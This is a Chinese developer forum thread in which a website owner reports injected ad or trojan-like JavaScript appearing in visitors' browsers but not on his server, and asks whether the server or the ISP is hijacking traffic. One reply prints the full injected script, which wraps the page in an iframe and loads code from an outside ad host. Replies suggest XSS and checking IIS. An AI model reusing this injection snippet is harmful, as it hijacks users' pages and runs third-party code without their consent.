网站被黑了吗,在本地浏览浏览有多出的脚本,但实际服务器上该文件没有这些代码,这是怎么回事呢?

goodgame365 2016-03-25 03:27:35
我的网站最近有用户反映说,页面播放不了,脚本出错,但我在本地测试正常, 后来远程上有问题的用户电脑一看,

发现我在这页面JS形式调用本站的aspx文件,被改写了,末尾多出了一代疑似木马广告的JS

马上进服务器查看这个aspx文件,但却没发现该文件有多出在浏览器出现的代码

所以以为是他家电脑的问题,就放下排查了。

但今天我突然发现打开这个播放页面时,也弹出JS脚本错误

刷新一两次,就没再提示错误,恢复正常了,感觉是被人植入广告代码了

我立马意识到问题严重性,感觉是我服务器的问题,但又知是哪里出问题

是服务器被劫持,还是本地网络的电信营运商劫持了,因为这个用户跟我是同个省份的!
请高人指点!
...全文
205 4 打赏 收藏 转发到动态 举报
写回复
用AI写文章
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
goodgame365 2016-03-25
  • 打赏
  • 举报
回复
这个代码出现后,发现右下角弹出广告,而广告内容竟然跟我顶部放置的百度广告内容一样,难道是百度联盟的JS有问题?
goodgame365 2016-03-25
  • 打赏
  • 举报
回复
早上起来打开,发现又出现了,但这次情况不同,是整个播放页面,而不是JS调用的那个aspx文件了 在浏览器右键查看源码发现,原来正常的脚本不见了,是一段疑似木马的代码 如下! ----------------------------
<html><head><title></title><body style="overflow-x:hidden;overflow-y:hidden;margin:0px;padding:0px"><script type="text/javascript">var u=document.URL,ua= navigator.userAgent.toLowerCase(),url="";if(u.indexOf("#")>-1){url=u.split("#")[0]+(~u.indexOf("?")?"&":"?")+(new Date().getTime())+"#"+(u.split("#").length>1?u.split("#")[1]:"")}else{url=u+(~u.indexOf("?")?"&":"?")+(new Date().getTime())}if(ua.indexOf('android')>-1||ua.indexOf('phone')>-1||ua.indexOf('linux')>-1){document.location.href=url;}else{document.write('<iframe src="'+url+'" name="'+(new Date()).getTime()+'" width="100%" height="100%" frameborder="0" border="0" marginwidth="0" marginheight="0"></iframe>');(function(){if(!document.body)return setTimeout(arguments.callee,50);var e=document.createElement("script");e.type="text/javascript",e.text='_guanggao_pub= "8e23dcd3d8fd2039a9f4";',e.text+='_guanggao_slot= "52b7a30ccda080d8584c";',document.body.insertBefore(e,document.body.children.item(0));var e=document.createElement("script");e.src="http://mm.tiansin.com/js/8e23dcd3d8fd2039a9f4",e.type="text/javascript",document.body.insertBefore(e,document.body.children.item(0))})();}</script></body></html>
yaotomo 2016-03-25
  • 打赏
  • 举报
回复
听描述像是XXS跨站脚本攻击?
蒋晟 版主 2016-03-25
  • 打赏
  • 举报
回复
可以写个aspx自己去读网页,看看IIS这一层有没有挂马。

62,074

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧